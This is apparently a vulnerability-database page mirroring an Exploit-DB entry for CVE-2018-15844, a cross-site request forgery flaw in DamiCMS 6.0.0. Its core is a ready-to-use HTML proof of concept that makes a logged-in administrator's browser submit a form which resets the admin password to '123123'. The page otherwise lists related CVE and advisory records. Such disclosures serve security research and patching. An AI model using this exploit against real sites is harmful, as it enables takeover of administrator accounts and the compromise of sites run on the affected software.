Lucene search
K

DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)

🗓️ 31 Aug 2018 00:00:00Reported by Autism_JHType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

DamiCMS 6.0.0 Cross-Site Request Forgery (Change Admin Password

Related
Code
ReporterTitlePublishedViews
Family
CNVD
DamiCMS Cross-Site Request Forgery Vulnerability (CNVD-2018-16532)
27 Aug 201800:00
cnvd
CVE
CVE-2018-15844
25 Aug 201821:00
cve
Cvelist
CVE-2018-15844
25 Aug 201821:00
cvelist
EUVD
EUVD-2018-7702
7 Oct 202500:30
euvd
exploitpack
DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)
31 Aug 201800:00
exploitpack
NVD
CVE-2018-15844
25 Aug 201821:29
nvd
Packet Storm
DamiCMS 6.0.0 Cross Site Request Forgery
31 Aug 201800:00
packetstorm
Prion
Cross site request forgery (csrf)
25 Aug 201821:29
prion
# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)
# Author: Autism_JH
# Date: 2018-08-30
# Vendor Homepage: https://github.com/731276192/damicms
# Software Link: https://github.com/731276192/damicms
# Version: 6.0.0
# CVE: CVE-2018-15844

# Description:
# DamiCMS v6.0.0 allows CSRF to change the administrator account's pssword.
# After the administrator login in,open the poc,the administrator account's 
# password will been changed to 123123

# POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
	<body>
		<script>history.pushState('', '', '/')</script>
		<form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST">
			<input type="hidden" name="username" value="admin" />
			<input type="hidden" name="password" value="123123" />
			<input type="hidden" name="role&#95;id" value="1" />
			<input type="hidden" name="id" value="1" />
			<input type="hidden" name="Submit" value="ç&#161;&#174;å&#174;&#154;ä&#191;&#174;æ&#148;&#185;" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation